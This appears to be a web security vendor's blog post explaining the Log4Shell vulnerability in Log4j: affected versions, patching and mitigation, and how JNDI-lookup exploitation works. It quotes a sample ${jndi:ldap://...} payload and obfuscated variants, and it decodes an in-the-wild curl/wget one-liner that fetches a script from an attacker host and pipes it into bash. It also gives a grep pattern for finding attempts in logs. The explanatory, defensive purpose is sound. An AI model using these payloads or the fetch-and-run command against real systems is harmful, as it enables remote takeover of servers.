Log4j Vulnerability: The Perfect Holiday Gift Nobody Wants


A critical remote code execution vulnerability in Log4j, the Apache Software Foundation's widely used Java logging library (tracked as CVE-2021-44228 and nicknamed Log4Shell), is taking the internet by storm because working exploit code is already circulating widely. It first drew public attention through Minecraft servers, but it affects any Java application that logs attacker-controlled input through a vulnerable version of Log4j 2, and it is being actively exploited by threat actors. This is by far the most serious vulnerability of 2021, with a score of 10/10 on the CVSS scale. Versions 2.0-beta9 through 2.14.1 are affected. It allows execution of arbitrary remote code and the potential for complete takeover of servers and endpoints by attackers.

Is my website secure?

The generic protection rules of our web application firewall protected against most of these exploitation attempts; however, we quickly pushed a fix to cover the new range of variants discovered. Websites behind our firewall are protected against this attack.

If you are running a server such as a VPS (Virtual Private Server), the question is not which web server you use but whether any Java software on the machine uses Log4j 2 (a Minecraft server, Apache Solr, Elasticsearch, and countless Java web applications deployed under Tomcat or similar containers). Apache httpd and NGINX are not written in Java and are not themselves affected, but either will happily pass a malicious request through to a vulnerable Java application behind it, so "I use NGINX" is not a reason to relax. Upgrade Log4j to the latest patched release: 2.15.0 was the initial fix, and the follow-on releases 2.16.0 and 2.17.x closed additional issues found afterward, so do not stop at 2.15.0. If you cannot upgrade immediately, the stopgap recommended in the Apache advisory is to remove the JndiLookup class from the log4j-core jar.

That said, the number of software applications that use Log4j is enormous and is not limited to websites. Even some routers and other hardware devices ship software that uses Log4j. Calling this attack surface "huge" does not begin to describe the extent of this vulnerability. It is safe to assume that many organizations, large and small, have already been compromised. Its severity is comparable to other catastrophic security failures such as Shellshock, Heartbleed, and EternalBlue.

ShellShock Flashbacks

Long-time web security enthusiasts will recall the 2014 Shellshock vulnerability in Bash (CVE-2014-6271). Log4Shell resembles it in that a vulnerable server can be compromised with nothing more than a crafted User-Agent header: in both cases, data the server was only supposed to record or pass along ends up being interpreted.

Because the flaw is in the logging library rather than in the web server, any attacker-controlled string that ends up in a log message is enough. The User-Agent header is the convenient choice, but request paths, query parameters, X-Forwarded-For headers, usernames and form fields all work just as well. The attacker embeds a lookup such as ${jndi:ldap://attacker-host:1389/a} in the request. When the vulnerable Log4j formats the message, it resolves that lookup by performing a JNDI query against the attacker's LDAP server; the server answers with a reference to a Java class hosted on another attacker-controlled server, and the victim's JVM loads and executes that class. The web server in front merely logs the request; it is the Java application behind it that runs the attacker's code.

Already exploited in the wild

Attackers immediately began to exploit this vulnerability. We have already seen many different attacks targeting this software, for example this base64-encoded command delivered inside a JNDI payload to potentially vulnerable servers.

Let's decode the string and take a look at what this attack does:

(curl -s ATTACKER-IP:5874/VICTIM-IP:80||wget -q -O- ATTACKER-IP:5874/VICTIM-IP:80)|bash

It is a one-liner that tries curl first and falls back to wget if curl is missing, fetches a script from the attacker-controlled server (the URL path carries the victim's IP and port, presumably so the attacker can tell which host called back), and pipes the response straight into bash, so nothing is written to disk before it runs. Anyone can guess what the content is, since it is controlled by the attackers and can be changed at will. One can only assume that they would use this exploit to take control of vulnerable servers in order to spread malware and potentially compromise entire systems.

Have I been attacked?

If you have access to your server’s Apache logs, you can run the following command to check if your server has been targeted:

grep -E -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/' /var/log

This lists exploitation attempts in the forms known to date: the literal ${jndi: form and the half-encoded $%7Bjndi: variant. Given the severity of this vulnerability, new variations are evolving as I type this article; attackers have already moved to obfuscated payloads such as ${${lower:j}ndi:...} and ${${::-j}ndi:...}, and to fully URL-encoded payloads (%24%7Bjndi...), which this pattern misses because it requires a literal $. Two caveats: a hit shows only that your server was targeted, not that the attempt succeeded, and a request recorded by Apache httpd or NGINX is harmless unless a Java application behind it also logged that input through a vulnerable Log4j. Check the Java application's own log files, wherever they live, not just /var/log.

In conclusion

If you own a website or operate a VPS or other server, update every piece of software that uses Log4j to the most recent patched release. Searching the file system for recently changed files can surface dropped payloads; if you find evidence of compromise, restore the server from a snapshot taken before the attack began, then patch the vulnerable software immediately so it is not exploited again.

If you are wondering whether any software you use on your server or home / work network may be at risk, review the list of affected products maintained by the Nationaal Cyber Security Centrum of the Netherlands (NCSC-NL).

If you are using a VPS, it is also advisable to run a host intrusion detection system such as OSSEC HIDS on the server. It will track system file changes and other potential indicators of compromise on the server itself (rather than just on your website).

To prevent your website from being a vector for this server exploit, you can also put your website behind our firewall and we will protect it from this attack and many others.

